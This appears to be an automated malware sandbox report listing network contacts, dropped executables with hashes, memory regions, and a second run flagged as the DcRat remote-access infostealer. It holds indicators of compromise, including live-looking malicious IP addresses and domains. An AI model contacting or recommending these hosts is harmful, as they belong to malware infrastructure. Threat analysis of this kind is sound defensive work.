RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
TR 185.50.70.125:443 tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
NL 80.85.246.217:80 80.85.246.217 tcp
RU 193.106.174.70:80 trad-einmyus.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard20.blob.core.windows.net udp
US 20.150.70.36:443 vsblobprodscussu5shard20.blob.core.windows.net tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 server8.createupdate.org udp
US 8.8.8.8:53 stun3.l.google.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
BG 185.82.216.104:443 server8.createupdate.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
IT 142.251.27.127:19302 stun3.l.google.com udp
US 8.8.8.8:53 carsalessystem.com udp
US 172.67.221.71:443 carsalessystem.com tcp
NL 80.85.246.217:80 80.85.246.217 tcp
NL 80.85.246.217:80 80.85.246.217 tcp
BG 185.82.216.104:443 server8.createupdate.org tcp

Files

memory/2932-1-0x0000000000230000-0x0000000000330000-memory.dmp

memory/2932-2-0x00000000003B0000-0x00000000003BB000-memory.dmp

memory/2932-3-0x0000000000400000-0x0000000002BE0000-memory.dmp

memory/1256-4-0x0000000002510000-0x0000000002526000-memory.dmp

memory/2932-5-0x0000000000400000-0x0000000002BE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6E2E.bat

MD5 55cc761bf3429324e5a0095cab002113
SHA1 2cc1ef4542a4e92d4158ab3978425d517fafd16d
SHA256 d6cceb3c71b80403364bf142f2fa4624ee0be36a49bac25ed45a497cf1ce9c3a
SHA512 33f9f5cad22d291077787c7df510806e4ac31f453d288712595af6debe579fabed6cdf4662e46e6fa94de135b161e739f55cfae05c36c87af85ed6a6ad1c9155

C:\Users\Admin\AppData\Local\Temp\84BB.exe

MD5 3d196de47911047d26c003e31a878038
SHA1 c368e8a2dacb6c322064f7f2aeb0b3cbcb274cd9
SHA256 19b9c4e7ba38960b14cf6557c7b6b7989009f0a7e368f1936050d1606c4cfc4a
SHA512 30871d6b7a9d94a602f21a6f5325f017c735db491351b64d9044b497c0f2d1cd8f0988857a358f29e077047ab5800a6384a2aa2ab17a539c2092d8828e87581b

memory/2648-26-0x0000000000330000-0x00000000003C1000-memory.dmp

memory/2648-27-0x0000000000330000-0x00000000003C1000-memory.dmp

memory/2940-31-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2648-30-0x00000000034E0000-0x00000000035FB000-memory.dmp

memory/2940-33-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2648-36-0x0000000000330000-0x00000000003C1000-memory.dmp

memory/2940-37-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2940-38-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2940-61-0x0000000000400000-0x0000000000537000-memory.dmp

memory/2972-63-0x0000000001B20000-0x0000000001BB1000-memory.dmp

memory/2972-64-0x0000000001B20000-0x0000000001BB1000-memory.dmp

memory/1952-71-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-72-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 610f387cecd6b98e4abcb72626ee7d13
SHA1 791f01f69d1e025c15660cc87c6a2d332c16d1c7
SHA256 dd9c87c9d210b8dcb6f9d2b897c11b0a480b955a0aeaf4bb9b661f1bdc0604d1
SHA512 97d58a6504e70c4ceb4f255c6327d076b8ffc017945a9a8474f1ece483a5326d572ef13d6e4e5ba6bc2dba4b9575f99085ca2af2dbabc375f6bf0e8bef554858

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 03fa66209b4cb101cc0ca864da3d5487
SHA1 9b794bb5ad8c9b3110e47a8523fe9fe852de97a2
SHA256 bc77e3b84899b3f13f5fc75cc7f619a907504455937106d7e824920d6b0108d9
SHA512 1449a85046331be1ae0d416d3cb519f9ae69d3c050b22b1174664ccfb4c7e8cab2bfb7b0352099bc3de10abfd9f5f5b84f947dedaa86dd79a7e81674092469c2

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 ee838a25e9da12e2a5819cc7e940d21e
SHA1 2f6c9e7c286639e8a02f5c77089da35d03d2bc39
SHA256 1b3833124a22415acee38345934fe8c65f17ec48b4d254388b11d30915823555
SHA512 f8f4e6705c009a7e3940e6e91b16726c649d67fcf7a45e0d1b02d8263ca52a1b21ed11f646dc7d23a87a7a3791688817914e86e1a44745bf16ced580e11b2d16

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9ebb75a2ee551a4cd3b5b7b39c3a8314
SHA1 9396c3710604e25efec53cdb48e4bebdc2ddbe62
SHA256 360d2ca65d4ff9c142c2bc0d1f7814c9847405f150a8e5cb8a2814bb6fac732c
SHA512 59854413e16a2480828c6fab0012652eb177d66d29a93fab1df8496d455686cb52ee3e6f0c759e151417b656d9466623b5382d2a81e269475d437032d7b7dd1f

C:\Users\Admin\AppData\Local\Temp\Cab8C0A.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

memory/1952-87-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-88-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-92-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-94-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-95-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1952-96-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build2.exe

MD5 c6d3d647baad8a5b93b81d2487f4f072
SHA1 e9c1105dc41f85d4f7e94d4e004f8427787c8802
SHA256 7754125653413cfca3bde887fb2a22f0cd5144ec447bb274c69b005861b70a0a
SHA512 55425dc95161e627e19e17f1bb910f958dade0c2b12da5eaad31159f0e2dc5217ff293c52f39d860d399807d5b4a814f1bb24376c58b40cc171d298282052049

memory/2244-112-0x0000000000470000-0x00000000004A6000-memory.dmp

memory/2244-111-0x0000000000280000-0x0000000000380000-memory.dmp

memory/2284-110-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2284-114-0x0000000000400000-0x0000000000649000-memory.dmp

memory/2284-117-0x0000000000400000-0x0000000000649000-memory.dmp

memory/2284-118-0x0000000000400000-0x0000000000649000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TarA67D.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

\Users\Admin\AppData\Local\786baa0e-1ea1-4bad-9bae-da8e1c27e104\build3.exe

MD5 41b883a061c95e9b9cb17d4ca50de770
SHA1 1daf96ec21d53d9a4699cea9b4db08cda6fbb5ad
SHA256 fef2c8ca07c500e416fd7700a381c39899ee26ce1119f62e7c65cf922ce8b408
SHA512 cdd1bb3a36182575cd715a52815765161eeaa3849e72c1c2a9a4e84cc43af9f8ec4997e642702bb3de41f162d2e8fd8717f6f8302bba5306821ee4d155626319

memory/1952-177-0x0000000000400000-0x0000000000537000-memory.dmp

memory/788-227-0x0000000000C50000-0x0000000000D50000-memory.dmp

memory/788-228-0x0000000000220000-0x0000000000224000-memory.dmp

memory/1508-239-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1508-242-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1508-244-0x0000000000400000-0x0000000000406000-memory.dmp

memory/1508-245-0x0000000000410000-0x0000000000477000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\B8D6.exe

MD5 0904e849f8483792ef67991619ece915
SHA1 58d04535efa58effb3c5ed53a2462aa96d676b79
SHA256 fca631b3198194fcc0c619b5690dbde2e9f38afb1b978bab8ea3f92b572ce1ef
SHA512 258fc59050aa455ad56167dd1bbe5e098eefc0f3e950c90d89bac2aa74abb5cfa1710d866c0e28e58dcb2f914736470a4dd9838dd6412b633aee87d71b867cf5

memory/2544-275-0x0000000000080000-0x0000000000081000-memory.dmp

memory/2544-277-0x0000000000ED0000-0x000000000177F000-memory.dmp

memory/2544-280-0x0000000000080000-0x0000000000081000-memory.dmp

memory/2544-278-0x0000000000080000-0x0000000000081000-memory.dmp

memory/2544-283-0x0000000077260000-0x0000000077261000-memory.dmp

memory/2544-284-0x0000000000190000-0x0000000000191000-memory.dmp

\Users\Admin\AppData\Local\Temp\B8D6.exe

MD5 91044e59972a50c139e40982ecd634a4
SHA1 36670182a5166f591780b98bedbef83bcac94950
SHA256 7285d2b17ba50b7cce109b7699f0cdcdd6adc900db2bc2279e751beb06bbb2b7
SHA512 93bc7fbf61afc7c42c1df62d59ed56e73eee4e06d518575633633211ede84be4f29afe240e417a2ca67a3fa5a26214d403d42257f1e612e24d40bea0803cfabc

\Users\Admin\AppData\Local\Temp\B8D6.exe

MD5 16d54f0d49c41790e1d265bc7452791a
SHA1 4f970896c8be729497106eac5c163321f1ba03f5
SHA256 20554829d97eb199a690636c1646ef1cbbc6ca93b078f5eae8a1c284b98d6a40
SHA512 ca121507f2833d31405201ef320fc5aa969d02e17fd754c7b6b088be102dcf38141e39a7f5f9ada76b6a9cc015cd6126145b9cdf7c6380d065e84a72085f32e9

\Users\Admin\AppData\Local\Temp\B8D6.exe

MD5 452d723c71b94983947183117a818966
SHA1 4b2fc7a2d747355eabb97da3988e7daccf942933
SHA256 b26f5d92a5a9761ca3f6935b55716e97ac3d59c31672b94660e52f74b2a043f6
SHA512 8c5f575e163eba6caecd6dc4062eca95756b46be6949910666ab0875f2f8fe4a4b8bf3d46213633d12bc8b44bac7a38598a5abd68c049dda713165bb46659558

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ad6566517eb3e9171d634756fbf3b078
SHA1 78705160e78e929c0e09232faa819175a1063c87
SHA256 a99f05d8aca8b5c545166628141a585021bc5275d4686eb2ac03a7445df5edb4
SHA512 3d42510ccc7a3b144da47849943f4a89f02ad28da6e733ecce52893dfe973329097ccc618b681c7c6e059b0a4bc4db0032d282e4e181f18b659f68c5b17c23c0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b2435d7a3ab468fc33970264424b92ab
SHA1 cd48c08aa31ae033e1ed796770296caa664f29c1
SHA256 d390ce7bfe6923bb7a45110c217ddffd4b8bd09606e72a1d6ed672d95c0cfa20
SHA512 5d90246fe4ca8d1fccd072a6a35e7dec288e9a8e71adac9e6f25f38aa360041fe0237e1572a82d0c6fd6924aeb38d5e88d372faf41f0d0b3420653792a0b973b

C:\Users\Admin\AppData\Local\Temp\C851.exe

MD5 ae508ddc1d7aa4458eee2e5d0589d309
SHA1 40d76a78c2233779b2ae684c3d514ad01a3f6243
SHA256 5bd900c94124ecfacb040aa8a991715591808e22e71ff15b11935b02db6e4b9d
SHA512 36510d03a35975e612944c859fda03a4f10d6dd1292d654dacb7a0d3e1ad5e86407e9339aea03d855c666d21a0f67035323ecdda6aeaffce5d7d81c52fee1d56

C:\Users\Admin\AppData\Local\Temp\C851.exe

MD5 c4cd2dabf6fe55752749ff664f9f9820
SHA1 b999a991aa6013a1cfe8d0bf5ee3e7ccd79012c9
SHA256 ecf58130e5f5905c6ab24345d42aa8ebf185bc45452fe9c93941d774d1d56c2e
SHA512 a2b64bbf37b291dbe3937100d228851024b44a953e91de6fedf1636dcaba7b4c02bcbd33fa21f0ce9fbdfde75a14893501ba583b0ddca0dce6968e67af5b6936

memory/2812-365-0x0000000003700000-0x0000000003AF8000-memory.dmp

memory/2284-366-0x0000000000400000-0x0000000000649000-memory.dmp

memory/2812-367-0x0000000003700000-0x0000000003AF8000-memory.dmp

memory/2812-368-0x0000000003B00000-0x00000000043EB000-memory.dmp

memory/2812-369-0x0000000000400000-0x0000000001E0D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\C851.exe

MD5 e2809f14a2f6abe51e7c3a9358b45320
SHA1 6c5e3bd8c078a1dc6cc36e8357ecd61ecb1ed879
SHA256 2496048773f210ec237d6559b673c29375537de6b1c7afc04157f4521b9945ae
SHA512 f5fbefba490e94d8bf3276a6fa964fd368a30c43fa9751c39d4ed14caa74eed17181c90f841442e3ec9800a36a80475557276cf20ae34a1b9f5e0d9e5614d9a9

C:\Users\Admin\AppData\Local\Temp\C851.exe

MD5 3ab209ecb992b40aed1e8302dccc40e3
SHA1 68fe47da7d354cda05d4c013211a85a585501e11
SHA256 dccd5f02946183688b6e2158588eb3854b56cc5b60fc03af8eadb66e005d36b9
SHA512 1bee2fbd894ce760cd86a9c27c1ff035c84e9196ca417521b902688b86ae1b796738a0184183ab7b9f7f74189ca380f19965d1b9fa6fd153f4a6c19d1f5d230c

memory/1088-372-0x0000000003870000-0x0000000003C68000-memory.dmp

memory/2812-373-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/1088-374-0x0000000003870000-0x0000000003C68000-memory.dmp

memory/1088-375-0x0000000000400000-0x0000000001E0D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\DE51.exe

MD5 41078ddcc4883c53b851fb092bcb79e1
SHA1 6370138391cc217a6b735ca2c1025d0382841a8e
SHA256 3d43f5bf00ff3e51dc4ccbc86bf0536859ea6db02b08097d6fe243405cb8d87a
SHA512 a5e9c66a734896ff3a08b2b791fe4463dff945a244a486fb0db67f899f283bde0fc5682dc324b0065e7679781bf7c09b45f9cac332d5b5356c2834535f84dce3

\Users\Admin\AppData\Local\Temp\DE51.exe

MD5 c617562971e5552332875f43dae92533
SHA1 92d2950d251b21da4b5a857b16f062f77179d296
SHA256 132f86e54a7ed28ca3d12789924a03770382eabc5f2ddbf8a72349b4b7e2453f
SHA512 0325463290224213cce0fd1b8488df105b3846a0ca177e9a3a809c9c2d10f200ecee93e1c2662cf532388f705808ea93ed76df98a82cbb31936801b5654b6208

memory/1568-381-0x000000013FDD0000-0x0000000140A32000-memory.dmp

\Windows\rss\csrss.exe

MD5 e06990f0d06b7d15911516f269e3a6ba
SHA1 ad6a54f561cf5bd104102d633563099583b85955
SHA256 8064f14de52225193e4beeb67bba22f365326f8e75c821418652f03c9485036a
SHA512 43b2cb09e0760dd3012738828607ca0a817cb3b5f88be68ed57d8e4c58cbfd15a393cc6686297591efc8305b6e480360017dfc2b540db81c0f3328900cdd1b58

memory/1624-390-0x0000000003880000-0x0000000003C78000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 0bccade864c0d26ce69bb20b4078cc7e
SHA1 07100885604cfae2503a7bbf45d1c1b9cefdc793
SHA256 c33f6fada92bd7d7987696dfbe0967a2d6d290bbb8ea39eea385f3b8b93dd0eb
SHA512 4802d4cdf9f7bb2c77b1ff87e393886583b45b96c5783faa438a7fbd599df5076101c992c81823cfdd678458714a62daaa5df7a3b0d4d11235d85f2fdc13c7ea

\Windows\rss\csrss.exe

MD5 9f34c2e370064241cedad4c516d45abb
SHA1 e46153375c4f9d022835808bc22a9830d3c49a40
SHA256 5c6e0a903792ccd74f468357295e4ba7e523c1ff4b4ea425b84681cc725ad805
SHA512 23cee66a628ee3ea2262aaae1f9486d002e04ccdc21311fd5543441a0ee62c9a5bf2a67a6e45434509b2c29ce902a88b2805297a15a3a9af16aee69cfec288cf

memory/1624-392-0x0000000003880000-0x0000000003C78000-memory.dmp

memory/1088-391-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/1624-393-0x0000000003C80000-0x000000000456B000-memory.dmp

memory/2544-394-0x0000000000ED0000-0x000000000177F000-memory.dmp

memory/1624-395-0x0000000000400000-0x0000000001E0D000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 b6189d36e70cbe35c31ed3868422625e
SHA1 6e3df2a994e44b3ab10f7a100d087a386517775e
SHA256 21e27a779afc78bf8dfa75b34a112b062bd522e29eba8ce5c3e43648c0ead0d8
SHA512 ce1e5d1a5909425695bedbe9597246782f469ec69d9b07c4a8459668e2471060f1859ebe1e8e86faef497e53325c4017188b963cfb35336c1dc908bebd096e7a

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 75cf9f6562ff34c3f0d52def91ea9749
SHA1 b07a693940408a71d9c958abe95b7146885788d7
SHA256 25c73a2f36e8c76791011ad0793d78b55abe7c4559139c5d05185ff864bcc89b
SHA512 b6848bc9263515b56e9c614fec192c22c13ab4dd92ca10c7de0bf41fd712c4068b19cda514bf27448c0ad3a24912d4ee74584a041c3a017fce1f4dcbfb9a8fc1

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 be81c865af1555afb8eebadc41ddd23d
SHA1 1b7c70c5993c853abd63ef0979c43d29e5af85b4
SHA256 57a3a50b9879911442aa8288969013c4c4e58819ed6755144a3d184c3a0e5326
SHA512 f535655ad385bd8510a74ccffefde9686c1c3e62f5b09c6a6f1ff31fa62efd2bc01f7e05b440f4cf3ce9a67ef1cb1d9c0bf7f37cc9636dc0bd5720462e149b02

memory/2068-410-0x00000000005D0000-0x0000000000BB8000-memory.dmp

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 da4d522afbbd4bfd319233177d1d29a5
SHA1 0763dafe8fc71605e47b2362d0ae9894c52918d0
SHA256 50d491bb9335a9aca1ecff83423dd210555e63972e373dd7e55d372aaa20fcd1
SHA512 3bdc8435f2f72c77000dce9fa753faad8f32fe2549c2b678b8d4b6126a6c7cc8a39161f987cfad83fd75b4a7d8b586382839b7021d3041e0743cedbd2da087ce

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 ce8858719d79eed3452092ee81b11f57
SHA1 b39a7a679383ddfd742df2be9aaa8f266b996e89
SHA256 2cdacbb582edb4e554d8a087946a7899b9b6d894249dee8cb93090a1637f5c20
SHA512 ceb3100ccdd39e90ac90c9d316b90a37ff10551f18ad67f3e311c820272c496cf371c1c2e760d7ece3c6ba28abbf9929a733dfba87de6c9918cc0db8d48db26e

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 0a6178814666c904769cb0f68e458af3
SHA1 e5382d19a1d27d64368cbf2225c8acf665cc7dd5
SHA256 49e6370aa9cbf74ced549635578146197d2ac789094cc4d8eeb75c8ad027e850
SHA512 ca382921c45af4624adbc3f0e738899118e924afb4451a925aa17eaa5c6d374eae28ae9a72fadd39f1593cc39422885f855b3f04bdbbb5a4f9f9571ca72f83c0

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 c11e6f45c4ace36caad7e0fc37c29adc
SHA1 54f7e63f9f431653169c8737877a49dc3525802e
SHA256 037ba343cc3876e31e33834401d28c10f3ab0ef11d6157e0d965bca8f0b237fd
SHA512 33d71133bb7414f163cef6314d34f96735bb8ce41a31af98dc6eafbe398020fa669a82cda8a507c88505a8eddc6bbba2886940edaf67ca4d03fb5a5c2b70fe7a

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 e421a139e44cfa762f19f169856dce92
SHA1 a4c28ed01efd28b55d5ae4df38b9ee372c58a4d9
SHA256 eb9366f7df2c1b52e18bc26c62b858ce23f72fe6a1eb16e81bc7a950d0ca9d59
SHA512 c89746ab379e39d55b81cf6bb40be24198f55831549e4920fd965a5be1bc576c5a45feb6204226295dd31158997b6bc1e460fa1fb53ee8bbca26808164261518

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 fa5fe67bbf51720a1810a8c78ba98767
SHA1 8caee866641a5f1f44e488929f3baa14baaf0816
SHA256 515d636ba9a21819b512ca3ed1767fda2334b5cd7c854cc1a55f712104d32113
SHA512 72880a5da5c838b0e26242dd8d12ea4dde40e551982223e598d655210f277996668f8e8259c9f18ea304007a0545ed2764582dc7c999e6fb1868fc56c0605f36

memory/2068-442-0x00000000007A0000-0x0000000000D88000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b11d6fd7ea686d12419300f2087b125e
SHA1 d51f803ad9e34ddc59250ee1a383547207454c15
SHA256 352b00f64ca7be1f4ae360b0e4555456c56c4bedea7c3f06f8a7435887dd4c7a
SHA512 528ce67df59c97c799a707e1e133d7ddee13ecb88424127b37f35e06bde6c1ed543776f4439860d2233107ac84b24705997fbe0c3916fc2871bbcf400fc010d7

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\EDE2.exe

MD5 00e3f4882f137105fd422a68c1abedd2
SHA1 e95713020236e6dc1efedea5deff6680190572b5
SHA256 f54394470bb9a9688de3aacd78430ad27e63803d1968d0c6e65fb0a6ebe94620
SHA512 d37b053a536fbbe581611e71b9c2a2f6a345fd8ca308a360d4573f4a9d1500b614a02923cd3d1194305b430f790c4e644b16f2d415192b58ccd48fbaa0b7207f

C:\Users\Admin\AppData\Local\Temp\EDE2.exe

MD5 36903ff1f3ff595fa0f07a184f2b5c62
SHA1 231f4500ee88f271024365da8d6f2e01f179968f
SHA256 9a5f9fa96d69e821725c4696328b745791448c4c81e69a93ff5085ab174a29d1
SHA512 1607eecbaf48c0a5bb6c13210ca757857664f98dc18f8e78d66d49390ccaf86af9c31d6159d2bb8dfcce50f36b234c70f3accbf77682206c23e2bde1a71f0458

memory/2684-506-0x0000000000F80000-0x000000000152A000-memory.dmp

memory/2684-507-0x0000000072B30000-0x000000007321E000-memory.dmp

memory/2684-508-0x0000000005000000-0x0000000005040000-memory.dmp

memory/2760-528-0x0000000000890000-0x0000000000990000-memory.dmp

memory/1624-531-0x0000000003880000-0x0000000003C78000-memory.dmp

memory/1624-532-0x0000000000400000-0x0000000001E0D000-memory.dmp

memory/2068-537-0x00000000005D0000-0x0000000000BB8000-memory.dmp

memory/2684-540-0x0000000072B30000-0x000000007321E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2F75.exe

MD5 f9f0fd78f541e1427a1c531becb20aff
SHA1 5c881f95a2902af550ef160a0a1d8f52ca51f802
SHA256 d94196430230b97ab47ec68df839598c21a9996fe45580a95712be8d561ccaf2
SHA512 6d39115a303fc9c69a2ba18d69438f346e7c4e546a43c41f7c3910f4e7ef13ee4f898826ed250aec77af2b70dc5a10eb81494efdcf33009c23e2829f05e30318

C:\Users\Admin\AppData\Local\Temp\2F75.exe

MD5 1ac1efba731f3020e96754f2472ec55c
SHA1 43dc7ed8b3f4521b118f3deae27a249ce2fe582e
SHA256 2040989b03a916d23217ede49ec52652294eef5000140e4f9819ba164af6de8f
SHA512 3e9ebcf535bf9eaf92ce03605269e90a8c2a9c00b80c65681f7f5ab25d0abfac7deedd12043f2ab93bd289dc8244463997f7670ed2be69028d24287cd0e2abeb

memory/1560-547-0x0000000001280000-0x00000000018D2000-memory.dmp

memory/2684-550-0x0000000005000000-0x0000000005040000-memory.dmp

memory/1560-549-0x0000000005050000-0x0000000005090000-memory.dmp

memory/1560-548-0x0000000072B30000-0x000000007321E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\34C3.exe

MD5 f987e9af00984e438d535ffbcee2c6ed
SHA1 c11fed0146bb3927544fa4616caa2aaf38273253
SHA256 336f07ff04674d30e651ea22fa3de86f0ca7f9588ffb73d2f7623f6016efd5db
SHA512 d5f42a51caff69825485cee2c23fb09a456afadc505aeea8bdbef1186243f085dc3583792ed5995520b8d0710aaf417e58f7e20278266c138de2e4c849686b1d

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 e7db04d67a840dc680bcd3cb6f71ce1a
SHA1 bb2c457d1b56eeedd242346baf85487b21f76ebc
SHA256 3c506e4cd2fb70ab2501011287489a936a950d89f6cefb9845f6310bcbde05b6
SHA512 a89e3afe09e27b124693e8c24cca1d6e13c664981a1ac0c5194a770d8480373db7d99f3a4514d1805a30a281559a017051de05e691784903df287242eca24c2f

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 b9f99ea071fccbb26ff2c02a6d20dd4a
SHA1 73468c2f9c19c09bcbedf7ae97e7665c623428e3
SHA256 c6aea7891b35e84fbaaf0c023da4c69fc5d37890a3333bff07992fffc38416d4
SHA512 d9a31c672e510f2367d0e8d8892de504cf18879f58effd2176876e5e9f953158cb8ee149865d50bf4d5df9e11b10069bf0787bc76b23dcd544625e83e34430fe

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

memory/1268-593-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2300-594-0x00000000002E0000-0x0000000000642000-memory.dmp

memory/2300-596-0x0000000000AB0000-0x0000000000AD6000-memory.dmp

memory/2300-598-0x0000000000A80000-0x0000000000A8E000-memory.dmp

memory/2300-600-0x0000000000A90000-0x0000000000AA0000-memory.dmp

memory/2300-602-0x0000000000AA0000-0x0000000000AB0000-memory.dmp

memory/2300-604-0x0000000000AE0000-0x0000000000AF0000-memory.dmp

memory/2300-606-0x0000000000AF0000-0x0000000000AFE000-memory.dmp

memory/2300-608-0x0000000002340000-0x000000000234E000-memory.dmp

memory/2300-610-0x00000000023F0000-0x0000000002402000-memory.dmp

memory/2300-612-0x00000000023D0000-0x00000000023E0000-memory.dmp

memory/2300-614-0x0000000002430000-0x0000000002446000-memory.dmp

memory/2300-616-0x0000000002550000-0x0000000002562000-memory.dmp

memory/2300-618-0x00000000023E0000-0x00000000023EE000-memory.dmp

memory/2300-620-0x0000000002410000-0x0000000002420000-memory.dmp

memory/2300-622-0x0000000002420000-0x0000000002430000-memory.dmp

memory/2300-624-0x000000001AE30000-0x000000001AE8A000-memory.dmp

memory/2300-626-0x0000000002570000-0x000000000257E000-memory.dmp

memory/2300-628-0x000000001AA00000-0x000000001AA10000-memory.dmp

memory/2300-630-0x000000001AA10000-0x000000001AA1E000-memory.dmp

memory/2300-632-0x000000001AA40000-0x000000001AA58000-memory.dmp

memory/2300-634-0x000000001B300000-0x000000001B34E000-memory.dmp

C:\containerProviderhost\sppsvc.exe

MD5 92bf2463d72a410bf291db2bbb0176f5
SHA1 bcc41c9861ce8ad99e2d951c49c50429b4dc8d7f
SHA256 92883022e82b89d32c6936ad8f94a35ac1eb0c2313656029977aec1b4973b808
SHA512 c803d47482aec6ac9c74ee20b401f03f3f2d4a1cc80770e1cf70319cbb7da715ee204cb15e585dbd6d9df0d9fb81254fdb6f6dae5d2147cbbbd85c3cf5b8d300

memory/2300-649-0x000007FEF4A90000-0x000007FEF547C000-memory.dmp

memory/2300-650-0x000000001B426000-0x000000001B48D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-02-25 22:45

Reported

2024-02-25 22:48

Platform

win10v2004-20240221-en

Max time kernel

150s

Max time network

153s

Command Line

sihost.exe

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
